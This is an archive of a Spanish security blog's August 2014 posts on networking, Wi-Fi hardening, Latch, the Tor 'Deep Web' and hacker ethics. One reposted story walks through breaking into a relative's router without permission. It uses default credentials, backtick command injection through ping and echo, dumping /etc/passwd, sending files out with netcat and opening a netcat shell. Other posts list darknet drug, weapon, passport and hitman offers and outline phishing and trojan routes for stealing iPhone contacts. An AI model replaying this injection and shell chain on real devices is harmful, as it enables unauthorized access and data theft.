domingo, 31 de agosto de 2014

Hackers, la FOCA ha muerto...pero llega Metashield Analyzer

Figura 1: "Españoles, Franco ha muerto"

No nací cuando se dio el vídeo que os he puesto antes, pero venía a hablar sobre un cambio de herramientas, dejando a una bastante famosa; atrás. Por eso he elegido este vídeo para empezar este Post.

Pero no vengo a hablar sobre democracia, ni dictadura, ni nada de eso. Simplemente vengo a contar que desde Eleven Paths han matado a la FOCA, que es una herramienta que he contado por aquí bastante como en el documento de Tony Blair. Ahora está funcionando Metashield Analyzer, que es lo mismo que la  FOCA, pero mejorada, y yo me he permitido usar esta herramienta con el documento de Tony Blair otra vez...para romper el hielo.

Figura 2: La nueva Metashield Analyzer

Tiene bastante buena pinta esta nueva herramienta e iré jugando con ella, aunque no voy a dejar de darle cariño a la FOCA, que tan buenas demos me ha dado. Antes de acabar debo decir que aún podéis descargar la FOCA, que no la han quitado; es que ya no la van a usar más. Por eso vosotros ya elegís cuál es más cómoda para vosotros, aunque no uséis siempre herramientas de "Un solo botón", intentar entender todo el proceso que ocurre por debajo.

Saludos Malvados!

sábado, 30 de agosto de 2014

Redes Wireless (II de ...)

Modelo TCP/IP

En el artículo anterior ya vimos uno de los modelos como era el OSI. Y hoy vamos a ver un modelo que es más conocido por la gente y que es el modelo TCP/IP. Este modelo es el estándar abierto de Internet, que es lo que permite la comunicación entre computadoras de todo el mundo. TCP/IP (Protocolo de Control de Transmisión/Protocolo Internet) y posee cuatro capas: aplicación, transporte, Internet y acceso a la red.

4 – Capa de aplicación: se combinan todos los aspectos relacionados con las aplicaciones en una sola capa. De esta forma las capas de sesión, presentación y aplicación del modelo OSI son equivalentes a la capa de Aplicación en TCP/IP, que nos garantiza la correcta disposición de los datos para la siguiente capa.
3 – Capa de transporte: directamente se corresponde con la capa de Transporte del modelo OSI. En esta capa usamos uno de sus protocolos, el TCP (protocolo para el control de la transmisión) que nos ofrece formas flexibles y de alta calidad para crear comunicaciones confiables y con errores bajos. Este protocolo es orientado a la conexión, lo que significa que los datos (segmentos) viajan entre dispositivos para comprobar que exista la conexión lógica para un determinado tiempo. Esto último es conocido como conmutación de paquetes.
2 – Capa de internet: como vemos en el diagrama, corresponde a la capa de Red del modelo OSI. El principal objetivo es enviar datos desde cualquier red y que estos lleguen al destino, independientemente de la ruta o redes necesarias para llegar.

1 – Capa de red: combinando la capa física y la de enlace de datos del modelo OSI obtenemos esta capa del modelo TCP/IP. El objetivo es enrutar los datos entre dispositivos en la misma red.

Figura  3: Comparación entre el modelo TCP/IP de 4 capas y
el Modelo OSI de 7 capas

Tipos de Redes

Las redes podemos clasificarlas según su extensión geográfica, de esta forma los tipos de Redes serían: LAN (Redes de Área Local), Redes MAN (Redes de Área Metropolitana), Redes WAN (Redes de Áreas amplias). Así podemos decir que las Redes LAN se usa para usuarios de entidad privada. Estas Redes pueden extenderse varios kilómetros pero que siempre van a estar restringidas por tamaño, por el cual su administración es simple y no hay retardos de transmisiones de datos y con un porcentaje bastante bajo de errores, las velocidades van desde 10 hasta 100 Mbs.

Figura 4: Esquema básico de una Red LAN

Ahora están las Redes más amplias que las  LAN, estas redes más amplias son las MAN que son un conjunto de Redes LAN interconectadas, y se conectan a través de routers y switchs. Estas Redes se dan en zonas geográficas relativamente amplias como ya hemos dicho y como consecuencia, la Transmisión de Datos es un poco más lento que en las Redes LAN, los errores son más también.

Figura 5: Ejemplo de varias Redes LAN (MAN)
Por último, están las Redes de una gran extensión como son las Redes WAN. Estas redes cuentan también con muchas Redes LAN interconectadas, llegando a conectar usuarios con cualquier punto del planeta. La más amplia y conocida es sin duda Internet.

Figura 6: Red WAN como pueda ser Internet.

Y hasta aquí la segunda parte de este post explicativo para las Redes Wirelesss, ahora te toca a ti recoger información y estudiar lo que llevamos. Ya aviso que serán bastantes artículos, como para escribir un libro, así que ve estudiando.

Saludos Malvados!

viernes, 29 de agosto de 2014

Latch Para tu cuenta de Latch

Ya he hablado sobre Latch y de cómo debes usarlo para no dejar tu "casa" abierta, para implementarlo en Shodan y eGarante o para SoyTeleco, y os traigo para que sepáis que desde hace ya algún tiempo puedes implementarlo también para tu cuenta Latch de Developer. Era sin duda uno de los que faltaba y desde hace un tiempo ya todos los que usen Latch pueden parear su cuenta Latch de Developer,

La implementación es como en todas, un código de pareado que saldrá en la aplicación como el que aparecerá en la Figura 1.

Figura 1: Código de Pareado en la App de Latch
Este código se debe introducir en tu cuenta de Latch de Developer, a la que se llega; iniciando sesión primero y después elegir la opción "parear mi cuenta de Latch con Latch ".

Figura 2: Opción de Pareado para tu cuenta de Latch

Una vez introducido el Token de Pareado en Latch de Developer, como siempre nos aparecerá en nuestra aplicación una cosa como esta.

Figura 3: Pareado con éxito de nuestra cuenta  Latch de Developer
Y esto es todo para parear nuestra cuenta de Latch de Developer. Es tan sencillo como en las demás cuentas que ya os he ido mostrando.

Saludos Malvados!

jueves, 28 de agosto de 2014

La Red Tor, La Deep Web y la Red Profunda (V de...)

Esta puede que sea la penúltima parte que le dedico a este macro-post sobre la Red TOR. Y en este post-que será más corto que los anteriores- os dejaré un programa que vi hace unos días por Internet y que hablaban sobre la Deep Web.

Este Documental se llama Tor, La Wed Invisible , y que ya os dejo que lo veáis vosotros tranquilamente.

El próximo post sobre la Deep Web será lo más seguro, mi opinión sobre la Red TOR con el que pondré fin a este macro post con el que contando el post de hoy llevo ya 5 partes para explicar y mostrar todo acerca esta Red.

Saludos Malvados!

miércoles, 27 de agosto de 2014

Un "Decálogo" no tan decálogo sobre Seguridad Wifi

Hace unos días me pidieron que escribiese unas reglas de Seguridad Wifi para un usuario común de la tecnología, yo he sacado el nerd que llevo dentro y en vez de un decálogo, le he escrito 18 reglas que todo usuario debería seguir para configurar su Red Wifi de forma Segura:

-Establece Cifrado WPA/WPA-PSK, utilizando AES.
-Cambia el SSID
-Cambia la clave por defecto de tu dispositivo
-Oculta el SSID
-Cambia periódicamente  el SSID y la clave
-Desactiva Wifi Protected Setup
-Filtra por direcciones MAC de conexión
-WPA/WPA2-Enterprise
-Apaga la Wifi cuando no la uses
-Cambia la contraseña de administración de tu punto de acceso
-No permitas la consola de administración en la WAN
-Configura tu Firewall de Internet y Filtra por IP
-Valida el BSSID de tu Red Wifi
-Utiliza una conexión VPN aunque sea tuya la Red ( A ser posible en SSTP, porque PPT2 no hace autentificación a nivel IP y L2TP basado en IPSec no pasa por todos los puertos cuando hay proxies cerca)
-Configura tu Firewall de tu sistema operativo
-Revisa los logs del router o punto de acceso Wifi
-Utiliza escaneo pasivo de conexiones
-Ten alertas ante ataques de Man In The Middle

Estas son las reglas que yo le he dejado al que me ha pedido este "Decálogo", pero tú tendrás muchas más además de estas, ya que estas ya las sabes y prácticamente ni las cuentas porque es demasiado básico...a que sí? };). Aunque no he puesto lo que creo que todo el mundo sabrá ya, que es:

-Actualiza el Sistema Operativo
-El Resto de utilidades de tu SO también deberías actualizarlo
-Ponte un anti-malware, que no es 100% efectivo pero te salva de bastantes cosas
-No te conectes a una Red Wifi que no es tuya, si lo haces, hazlo con una VPN
-ETC...

Saludos Malvados!

martes, 26 de agosto de 2014

Grasias por la WiFi primo!

A mí cuando me da por algo, me da; ahora estoy liando con Redes a ver si repaso un poco los conocimientos. Así que iré escribiendo estos día sobre Redes, Redes Wifi, etc. Si a esto le sumas que me encuentro un post como el que traigo a continuación en 48bits, pues ya aprovecho y os dejo una historia real. Espero que os guste y tened cuidad con vuestra Red Wifi.

Saludos Malvados!
***********************************************************************************
Post escrito por Gabriel Gonzalez en 48bits


Estaba un día trabajando en casa de mi primo y necesitaba acceso a Internet, por lo que obviamente le pedí la clave de la WiFi y de muy buena gana me la proporcionó, a lo cuál le agradecí su tan generoso gesto.

Para proseguir con mi actividad productiva necesitaba redirigir un puerto hacia mi máquina así que, dado que las cualidades técnicas de mi primo no van más allá del facebook, decidí hacerlo sin preguntar y aquí comienza realmente la historia.

Me conecté al Router y comencé a probar las N combinaciones de cuentas de administrador que me conocía y alguna más que busqué por la web:

$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is ‘^]’.
BCM96328 Broadband Router
Login: admin
Password:
Login incorrect. Try again.
Login: admin
Password:
Login incorrect. Try again.
Login: 1234
Password:
Authorization failed after trying 3 times!!!.

Sin resultado satisfactorio, me dirigí a mi primo con la oreja gacha herido en el orgullo hacker para preguntarle el usuario y contraseña, a lo cual me respondió con un “no sé de qué me hablas”. Perfecto, estaba a punto de arruinar un día entero de trabajo…

El siguiente paso fue intentar escalar privilegios desde una cuenta de usuario para consultar, por suerte éste router tenía la contraseña por defecto user/user habilitada, pero obviamente no permitía cambiar ningún parámetro, primero los pasos básicos para obtener shell de alguna manera:

$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is ‘^]’.
BCM96328 Broadband Router
Login: user
Password:
 > ?
?
help
logout
exit
quit
reboot
dnsproxy
ping
lanhosts
passwd
restoredefault
save
swversion
uptime
cfgupdate
swupdate
exitOnIdle
wan
build
version
serialnumber
 > sh
telnetd:error:607.372:processInput:380:unrecognized command sh
 > version && sh
Warning: operator & is not supported!
A731-410JAZ-C05_R01.A2pD035g.d23i
 > version ; sh
Warning: operator ; is not supported!
A731-410JAZ-C05_R01.A2pD035g.d23i
 >

Vaya por dios, parece que se han tomado en serio la seguridad los que han hecho esta versión de firmware! Pensemos durante unos segundos qué más podríamos probar:

> `sh`
telnetd:error:790.629:processInput:380:unrecognized command `sh`
 > `echo`
telnetd:error:793.334:processInput:380:unrecognized command `echo`
 > ping `echo ls`
ping: ls: Unknown host
 >

Bingo! Parece que tenemos una manera de ejecutar comandos, sigamos jugando un poco más:

 > ping `ls`
ping: bin: Unknown host
 > ping `ls /`
ping: bin: Unknown host
 > ping `ls /etc`
ping: adsl: Unknown host
 > ping `ls /etc/passwd`
ping: /etc/passwd: Unknown host
 > ping `cat /etc/passwd`
ping: admin:XX.YUYYEYE.ER.s:0:0:Administrator:/:/bin/sh: Unknown host
 >

Perfecto, ya tenemos la clave de admin que era lo que necesitábamos; después de preguntar a nuestro amigo John pude redirigir el puerto que necesitaba. Pero ya que no parece tener la shell disponible fácilmente seguí un vistazo a ver qué podemos sacar desde la cuenta de admin.
Como se puede ver a continuación, tiene mucho más comandos, en concreto me llama la atención el comando echo:

$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is ‘^]’.
BCM96328 Broadband Router
Login: admin
Password:
 > ?
?
help
logout
exit
quit
reboot
adsl
xdslctl
xtm
brctl
loglevel
logdest
virtualserver
ddns
df
dumpcfg
dumpmdm
meminfo
psp
kill
dumpsysinfo
dnsproxy
syslog
echo
ifconfig
ping
ps
pwd
sntp
sysinfo
tftp
wlctl
arp
defaultgateway
dhcpserver
dns
lan
lanhosts
passwd
ppp
restoredefault
route
save
swversion
uptime
cfgupdate
swupdate
exitOnIdle
wan
build
version
serialnumber
 > echo `ls /`
bin data dev etc lib linuxrc mnt opt proc sbin sys tmp usr var webs
 > echo `cat /etc/passwd`
admin:XX.YUYYEYE.ER.s:0:0:Administrator:/:/bin/sh support:XX.YUYYEYE.ER.s:0:0:Technical Support:/:/bin/sh user:XX.YUYYEYE.ER.s:0:0:Normal User:/:/bin/sh ftpuser:XX.YUYYEYE.ER.s:0:0:user for ftp:/:/bin/sh nobody:XX.YUYYEYE.ER.s:0:0:nobody for ftp:/:/bin/sh

Con el comando echo podemos ver la salida completa de los comandos ejecutados! Exploremos a ver que tiene este dispositivo:

 > echo `ls /usr/bin`
[ expr ftpget killall logger md5sum nc test tftp top tty wget
 >

Wow, hay un nc por ahí! Podremos usarlo para copiar ficheros dentro y fuera del mismo? Además tenemos un md5sum que nos viene perfecto para ver si la copia ha sido satisfactoria. Probemos con el binario /bin/httpd:

 > echo `ls /bin/httpd`
/bin/httpd
 > echo `/usr/bin/nc`
BusyBox v1.00 (2011.10.28-05:10+0000) multi-call binary
Usage: nc [OPTIONS] [IP] [port]
Netcat opens a pipe to IP:port
Options:
        -l              listen mode, for inbound connects
        -p PORT         local port number
        -i SECS         delay interval for lines sent
        -e PROG         program to exec after connect (dangerous!)
 > echo `cat /bin/httpd | /usr/bin/nc 192.168.0.8 3333`
 > echo `/usr/bin/md5sum /bin/httpd`
12b41761c640455b87038fb32f49334e /bin/httpd
 >
Comprobando en mi PC:

~/tmp$ nc -l 192.168.0.8 3333 > httpd
~/tmp$ md5sum httpd
12b41761c640455b87038fb32f49334e  httpd
~/tmp$
Funciona perfectamente! Probemos a enviar un fichero…
~/tmp$ cat | nc 192.168.0.1 3333
#!/bin/sh
echo "w00w00"
~/tmp$
Y en el router:
 > echo `/usr/bin/nc -l -p 3333 > /tmp/test.sh`
 > echo `sh /tmp/test.sh`
w00w00
 >

Ya que tenemos el nc y que andar ejecutando comando a golpe de echo es un poco coñazo, una reverse shell nos vendría de lujo! Let’s try it, primero ponemos a escuchar el nc en el router:

> echo `/usr/bin/nc -l -p 3333 -e /bin/sh`
Y después nos conectamos desde el PC:
~/tmp$ nc 192.168.0.1 3333
ls /
bin
data
dev
etc
lib
linuxrc
mnt
opt
proc
sbin
sys
tmp
usr
var
webs
ls /tmp
/tmp
cd /tmp
ls
bootupmessages
test.sh
cat test.sh
#!/bin/sh
echo "w00w00"

Yeah! Pues nada, ahí tenemos control total de manera remota y ya podemos seguir jugando más cómodamente, aunque eso será para otra entrada en el blog!

No me sigas por la calle! Sígueme por el twitter http://www.twitter.com/gabrielgonzalez


lunes, 25 de agosto de 2014

¿De profesión...Hacker?

Ni yo mismo entiendo porqué estoy escribiendo este post, pero una respuesta tendré que dar a esos correos que estoy recibiendo diariamente durante un tiempo y que me preguntan esto de "Hola Manu, ¿Qué tengo que hacer para ser hacker?" pero la verdad, no me imagino que ninguno de los que son hackers, alguna vez hayan realizado esta pregunta a nadie. Pero bueno ahí voy, intentaré explicarlo lo mejor posible.

Qué es ser Hacker

Pues ni yo mismo sé cómo responderos, porque no tiene una definición exacta, pero intentaré acercarme lo máximo posible. Para mí, ser un hacker es una persona que vive la tecnología de forma diferente y que siente verdadera pasión por ella. Ser Hacker no es robar contraseñas como se creen muchos; ser hacker es preocuparse por la seguridad de usuarios y administradores de sitios webs, buscar sus fallos y reportarlos redactando un informe con sus bugs y cómo podría solucionarlos. Ser hacker está relacionado muchas veces con la seguridad informática, pero no tiene porqué ser así. Y es que muchas empresas contratan hackers para ocuparse de la seguridad, porque proteger la información es algo bastante necesario, cualquier fuga; por pequeña que sea ya es un problema gordo.

Pero hay un gran problema, y es...la gente, sí esa gente que se enfada con los hackers por reportarles un fallo de seguridad. Aunque no sé si tienen conciencia de que se les podría hacer daño, pero no ha sido así, y ese trabajo-porque es un trabajo-debe ser recompensado, y asea con un simple "GRACIAS"...que cosa tan simple, pero que poca gente hace }:(

Ser Hacker no es crackear un juego para Android y tener muchas gemmas, quien quiera "ser hacker" y piense que es eso, por favor salga de la sala. Ser Hacker, es leer, leer, leer, estudiar, estudiar, estudiar, estudiar, practicar, practicar, practicar, practicar y volver a practicar; muchas veces intentarás hacer algo y no te saldrá, no pasa nada, es normal; simplemente es que hay que revisar algo, aprender de los errores y corregirlos. Si no te gusta leer, amigo apaga y vete a otra cosa, que aquí hay que leer bastante; y ya no solo en español, también en inglés, así que hay que ir aprendiendo inglés.

Un hacker bueno, no es el que sabe mucho de todo por usar un script sin más o usar una herramienta simplemente, hay que pensar también y bastante. No vayamos a lanzar sricpts sin saber que estamos lanzando, hay que pensar y bastante.

Además no te puedes centrar sólo en la seguridad informática, y menos si estás empezando, yo te recomendaría que estudies lenguajes de programación-todos los que puedas- sobre todo HTML, PHP, MySQL, C++, .NET, etc  además intenta aprender Redes y Sistemas. Y recordar que hay que ir actualizando los conocimientos, ya que la tecnología se actualiza y cambia.

Saludos Malvados!

domingo, 24 de agosto de 2014

Redes Wireless (I de...)

El estar metido en Seguridad no implica estudiar solamente seguridad informática. El mundo de la Seguridad Informática abarca más temas y hay que aprender sobre todo tipo de cosas relacionado con la Informática. Este "curso" sobre Redes, veo que es interesante de que lo sepáis o reviséis lo que sabéis y no sabéis. Las Redes he de decir, que son bastantes importantes y que a mí me apasionan-ya sabéis que a mí, las Redes y las Redes de Datos es lo que más me gusta y que he llegado a profundizar mis estudios en IPv4 e IPv6-. Pero una cosa debo dejar clara, saber sobre redes no implica que el tema de Man In The Middle con el protocolo SLAAC lo domines, ya sabéis eso que ya he contado de cómo se podría saber un usuario y una contraseña, aunque la mayoría de estas se puedan encontrar en Google con una simple búsqueda. Pero al que le apasione la informática tanto como a mí, no le importará estudiar lo que sea, porque no lo verá como estudiar; lo verá como leer una cosa que me encanta y que me puedo tirar horas y horas-que es lo que me pasa a mí con mi querida informática- aunque también debo decir, que yo estoy aprendiendo aún día a día-Informática persistente- por eso si tengo cualquier error os pido que lo entandáis, ya que hay más cosas que no sé que las que sé; por eso sigo estudiando cada día sobre este mundo tan amplio a la vez que bonito.

Además, que menos que dedicarle un macro post, a lo que a los informáticos nos ha dado la vida, como es IEEE 802.11-WIFI- que necesita de Redes para que le llegue la información y que mande también. El IEEE 802.11, no es otra cosa que una red bastante amplia con lo que te permite intercambiar datos a una velocidad increíble, por eso lo primero que tenemos que hacer antes de cualquier cosa con Redes, hablar de Redes TCP/IP, etc. es saber lo que es una Red.

Qué es una Red

Llamamos Red, a un conjunto de ordenadores que están conectados bien por cables que sería un medio físico, o por ondas electromagnéticas. Tienen un objetivo principal, que es difundir recursos e información entre los dispositivos conectados a esa red.

El Modelo OSI

Creado por la ISO ( International Organization for Standardization)  nació a causa de la necesidad de poder comunicarse y trabajar de forma conjunta  con las diferentes redes. Cada red podría usar una especificación especial, pero existían incompatibilidades a la hora de establecer comunicación entre ellas.

Estas incompatibilidades eran normalmente en hardware y software, por lo cual las comunicaciones no eran muy buenas, "caos". Pero la ISO, "hace del caos un arte" para así poder maravillar a un tipo con gorro y bastante malvado, con lo que crea un idioma en común para todas las redes de ordenadores, con esto nos aseguramos de que exista compatibilidad entre todas ellas. El modelo OSI, cuenta con 7 capas numeradas y en la que cada una de ellas muestra una función de red especifica.

Figura 1:  Capas propuestas por el modelo OSI
Función de cada capa

En este modelo identificamos que cada una de las 7 capas debe realizar un conjunto de funciones para que los datos viajen en la red desde el emisor hasta el receptor.

Figura 2: unciones de cada capa

7- Capa de aplicación: esta es la capa con la que más interactúa el usuario. No da servicios a las demás capas del modelo OSI, sino solo a aplicaciones fuera del modelo. Cuando un usuario necesita realizar una actividad (leer o escribir e-mails, enviar archivos, usar una hoja de cálculo, un procesador de texto o similar), el sistema operativo va a interactuar con esta capa para llevarla a cabo.
 6 – Capa de presentación: Se busca tener un formato de datos en común, se garantiza que los datos enviados por la capa 7 de un sistema pueda ser entendido por la misma capa 7 pero de otro sistema. En caso de ser necesario, la información será traducida usando un formato en común. Ejemplos en esta capa pueden ser los formatos MP3, JPG, GIF, entre otros.
 5 – Capa de sesión: en esta capa establecemos, mantenemos y terminamos las comunicaciones entre dispositivos de red que se están comunicando. Podemos pensar esta capa como una conversación.
 4 – Capa de transporte: verifica si los datos vienen de más de una aplicación e integra cada uno de estos en un solo flujo de datos dentro de la red física. A esto lo llamamos control de flujo de datos. Además se realiza la verificación de errores y recuperación de datos.
3 – Capa de red: determina cómo serán enviados los datos al receptor. Realiza la conexión y la selección de la ruta entre dispositivos que pueden estar en diferentes redes.
2 – Capa de enlace de datos: a los datos provenientes de la capa 3 se le asigna el correspondiente protocolo físico (para hablar el mismo idioma), se establece el tipo de red y la secuencia de paquetes utilizada.
 1 – Capa física: es la parte hardware del modelo. Acá se definen las especificaciones o características físicas de la red, como niveles de voltaje, cableado, distancias de transmisión máximas, conectores físicos usados, entre otros atributos descriptos dentro de las especificaciones de la capa física. Para que recordemos fácilmente todas las capas podemos dividirlas en dos grupos, grupo de aplicación y grupo de flujo de datos. Las que pertenecen al grupo de aplicación realizan funciones vinculadas al tratamiento y preparación de los datos, para que luego sean transportados a destino por el grupo de flujo de datos (o también llamado grupo de transporte). Las capas del grupo de aplicación son la Capa de aplicación, Capa de presentación y Capa de sesión. Y las del grupo de flujo de datos: Capa de transporte, Capa de red, Capa de enlace de datos y Capa física.

Hasta aquí la primera parte del artículo donde trataré de explicar las redes Wireless, en el próximo post donde explique esto, hablaré sobre el modelo TCP/IP que supongo que entenderéis más por el simple hecho de escucharlo con bastante frecuencia.

Saludos Malvados!

sábado, 23 de agosto de 2014

La Deep Web, La Red profunda y la Red Tor (IV de ...)

Como ya dije en el último post dedicado a Tor,, a partir de ahora me dedicaría a enseñaros algunas de las cosas que me he encontrado por esta red, y digo algunas porque muchas cosas que he visto son demasiado impactantes como violaciones en directo o suicidios,etc. eso lo más flojito dentro de lo más duro a su vez. Pero ya lo iré explicando con calma y daré mi opinión sobre esta red y qué se debería hacer para cambiar algunas cosas; también os informo de que ya quedaran 2 o 3 posts más para este macro-artículo que estoy redactando. Así que vamos a empezar ya con algunas cosas que me he encontrado en esta red.

Lo primero es que no hace falta entrar en la Red Tor para encontrar por ejemplo Drogas, Armas,etc. ya que Google te lo muestra simplemente buscando por dominios onion.to.


Figura 1: Drogas de la Red Tor en Google
También si quieres ser ciudadano con tu pasaporte de Reino Unido, siempres puedes buscar pasaportes de la Red Tor en Google que como dice un amigo "el que busca encuentra, que que rasca encuentra...esto me lo dijo un chaval con piojos" je je je {Bromas aparte}.

Figura 2:  Pasaportes en citizenship
En este caso, Citizenship es uno de los servicios más conocidos según he podido ver, y siempre se venden los pasaportes o DNIs falsos con Bitcoins, USD o Liberty Reserve.

Ahora ya que hemos visto brevemente lo que nos puede mostrar la Red Tor podemos pasar ya a buscar en dicha red, lo primero es que si vosotros queréis hacer esto también porque tengáis la vena de investigador como yo, lo que os debo decir es que tengáis mucho cuidado ya que como he dicho en apartados anteriores; aquí hay mucha gente esperando para atacar a quién ande por ahí. Por eso actualizar busco Anti-malware y usar una VPN por lo que pueda pasar.

Figura 3: Pasaportes de UK en Tor
Pero esto de aquí es la forma larga de encontrar cosas, la otra es meterte por foros donde van dando links para que te metas, claro está antes te dicen de que va cada link-porque un sitio donde consigue ocultar tu dirección IP no va a hacer una cosa tan tonta como que las URLs sean predecibles y con el nombre del sitio-. Ahora eso sí te encuentras bastantes cosas que te dejan atónito.

Figura 4: Scribd te deja unos lins para que disfrutes de tu navegación en Tor
Como vemos en la Figura 4, hay links que apuntan a sitios donde puedes comprar Cannabis de Holanda, Weed, Hash, Mariguana,etc. todo esto lo debes pagar con Bitcoins. Pero además de eso, sitios de Hacktivismo libre, sitios para comprar armas, sitios para comprar software para hacer DDOS,etc. y todo esto y más que no he mostrado con una backup de links para navegar por la Red Tor.

Figura 5: Otra de las backups con links para navegar por Tor
En el caso de esta Backup, te puedes encontrar desde librerías de la Red Tor, armas,  sitios para enviar Emails anónimos, Mercado Negro, la famosa TORCH, aprender a ser un gran mentiroso hasta cómo conseguir información detallada de cualquier persona, y por todo esto, obviamente la gente paga y bastante.

Lo suyo sería entrar en cada link-cosa que he hecho con bastante cuidado- y así ver qué nos ofrecen. Uno de los sitios donde te va a mandar a bastantes Foros en español, es TORCH, donde preguntes lo que preguntes te saldrán resultados la más de curiosos cuanto menos.

Figura 6: Las drogas en TORCH
Figura 7: Las armas en TORCH
Lo más normal es que cuando preguntéis en TORCH, os salgan muchos resultados; pero uno de ellos es un foro en español que es de los más conocidos y donde te encuentras cada barrabasada qué te deja los ojos como platos, es más yo aún no me creo bien que pueda existir ese tipo de cosas, y que encima sea público. Ese foro es CebollaChan, que cuenta con bastantes visitantes diariamente.

Figura 8: Quieren ver archivos militares y armas en sitios que no haga falta login y
que esos archivos no estén con contraseñas
Otra de las cosas es que si hay armas, debe haber asesinos...pues sí que los hay, no sé si es real o ficticio, pero ni de coña pienso probarlo para ver si es real o no }|(. Y para esto, unos de los asesinos más famosos dentro de la Red Tor es C'thulhu, con tarifas de 20.000 USD.

Figura 9: Asesino C'thulhu en Tor

También hay lugares donde el precio de matarte depende a lo que te dediques, por ejemplo los periodistas o paparazzis son los más caros, llegan a pedir hasta 50.000 USD. De todas formas os dejo las tarifas para pesonas ordinarias, policias,etc.

Figura 10: Tarifas de un asesino, el precio depende de la persona


Después lo que también hay, es la posibilidad de usar correos anónimos como TorMail, en el que es bastante sencillo crear una cuenta, yo tuve la mía en menos de 4 minuto, además por si no te fías de JavaScript-que haces bien- te dan la posibilidad de elegir Squirrel Mail, que no usa JavaScript, caso contrario a RoundCube.

Figura 11: Posibilidades de Webmail en TorMail

Todo esto de los correos anónimos, recuerda al caso de Santiago Cervera-caso del que me he estado informando estos días- y para el que no lo sepa, es el caso de un político que daba bastante guerra a Caja Navarra y quería desmantelar todo lo que por ahí se cocía y un buen día recibe un correo anónimo diciendo que le iban a dar información bastante valiosa en un sobre, que se lo darían en una muralla de Pamplona, él dice que no acepta eso; pero no se sabe porqué va hasta allí con gorra, gafas de sol pero...CU CÚ, ahí estaba la Policía que lo arrestó...AHHHH por cierto, en el sobre no había ninguna información, solamente unos 50.000 euros.

Después Caja Navarra decía que habían recibido un correo donde les chantajeaba con 50.000 euros...oh wait a moment please- que casualidad, lo mismo que había en el sobre...y encima detienen a Santiago, que era el que les daba guerra...Será casualidad.

Figura 12: Mail de respuesta de Santiago Cervera
Esto huele un poco a que le hayan tendido una trampa...o no, pero si recordamos; todo esto está hecho desde la Red Tor, que qué era esto...Ahhh sí, una red donde ocultan tu dirección IP y donde ni con una orden judicial pueden investigar lo que ocurra dentro de esta red...la de casualidades que hay en este caso. Pero a día de hoy, aún no se sabe nada, ni creo que se sepa.

Y ya lo último que tengo que enseñaros-pero no es todo como ya he dicho al principio- es el de subir archivos de forma anónima y compartirlos con las demás personas. Aquí creo que no hace falta qué archivos puedes llegar a encontrarte.

Figura 13: Sube tus archivos de forma anónima a anonfiles
Con esto llego al fina de este cuarto post sobre la Deep Web, aún qued aun quinto y puede que sexto post, pero de momento si queréis ver lo que yo, aquí tenéis; pero hacerlo con cuidado {Sigo hablando sobre informática je je je}

Saludos Malvados!

***************************************************************************
La Deep Web, La red profunda y la Red Tor (I de...)
La Deep Web, La red profunda y la Red Tor (II de...)
La Deep Web, La red profunda y la Red Tor (III de...)
La Deep Web, La red profunda y la Red Tor (IV de...)
***************************************************************************

viernes, 22 de agosto de 2014

Hijacking de Facebook para sacar credenciales

Hace unos días subí un vídeo a mi canal de Youtube sobre como robar una sesión de Facebook haciendo uso de Hijacking y robar una cookie de sesion para usarla y entrar sin mayor problemas a una cuenta. Con esto lo único que intento es enseñar que no es aconsejable conectarse a cualquier Red Wifi sin usar por lo menos una VPN en STTP, porque te conectas a una Red Wifi que no sea la de vuestra casa y mira lo que pasa...

Figura 1: Hijacking a una cuenta de Facebook y 
robo de cookie de sesion

También quiero dejar clara una cosa, y es que yo esto se ha hecho con una máquina virtual-esto lo ha hecho Flue Project- para que no sea ilegal, pero por descontado que YO NO ME HAGO RESPONSABLE DEL USO QUE HAGÁIS a lo que se enseña en el vídeo.

Saludos Malvados!

jueves, 21 de agosto de 2014

10 formas de robar la agenda de contactos de un iPhone 4/4S

No he podido leer este post y no acordarme de las recomendaciones que yo le di a un usuario común de iPhone sobre cómo te pueden robar datos de tu terminal de forma muy sencilla. Todoe sto para que aprendiese y tomase unas medidas que evitaran lo que le estaba contando; el chaval lo hizo-le constó hacerlo bien al principio, pero después fue todo genial-.Y es que he leído este post de Chema Alonso y acordarme, por si tenéis un iPhone que toméis medidas.

Saludos Malvados!

Post sacado de una entrada en el Blog de Chema Alonso

Pipi Estrada, el periodista que le robaron la agenda de teléfonos de famosos que acabó publicada en Internet tiene un iPhone. Es además un - probablemente - iPhone 4 o 4S - por lo que se puede ver en esta imagen que publica él mismo en Twitter -, no creo que tenga una versión anterior del terminal, pero es lo que está levantando tanta expectación sobre cómo le han podido robar la agenda de contactos de su terminal... y la verdad es que no es tan excepcional o extraño como pueda parecer.


Lo primero que se nos viene a la mente es la posibilidad de que le hayan hackeado su terminal y un *hacker* se haya colado dentro para sacar los contactos, algo que podría hacerse de diferentes formas. Sin embargo, yo tengo mis propias teorías. Aquí os dejo 10 formas de robarle la agenda a Pipi Estrada de su iPhone 4/4S.
1) Con un APT: Averiguamos su UDID del iPhone y su dirección de correo personal y generamos un provisoning profile. Le enviamos un troyano por correo electrónico, acepta las dos alertas de seguridad y se come un troyano tipo FinSpy que nos reporta todos los contactos. 

2) Con un APT de una Fake CA y un mitm: Averiguamos su correo y le enviamos una fake CA para luego hacer un mitm con un rogue AP cercano. Después le mandamos a un portal cautivo y le pedimos su contraseña de Apple iTunes. Con ella accedemos a su backup en iCloud y descargamos los contactos. 

3) Con un JailOwnMe: Pipi no tiene actualizado el software de su iPhone y es vulnerable a los exploit de comex. Le mandamos un tweet con un link a un PDF y cuando lo abra tenemos una shell con JailOwnMe que nos permite acceder a sus contactos. 

4) Con un Address Bar Spoofing: Pipi no tiene iOS 5.1.1 iOS 6 y le enviamos un link al twitter cuando está twitteando para que entre en un phishing hecho con address bar spoofing y le robamos la password de iCloud. Desde allí descargamos su agenda. 

5) Si Pipi tiene sincronizado su Gmail con su iPhone: Un Phishing burdo por correo electrónico o Twitter, Pipi pone su password y se accede a los contactos de Gmail para descargar su agenda en un csv. 

6) Backup involuntario: Si Pipi enchufa su terminal a un equipo para que se cargue la batería, en un descuido hacemos un backup con el iTunes y listo. 

7) Un Forense en 10 minutos: Tenemos acceso físico al terminal, lo pinchamos a un Oxygen Forensics y en 10 minutos volcamos todo el terminal a nuestro equipo. 

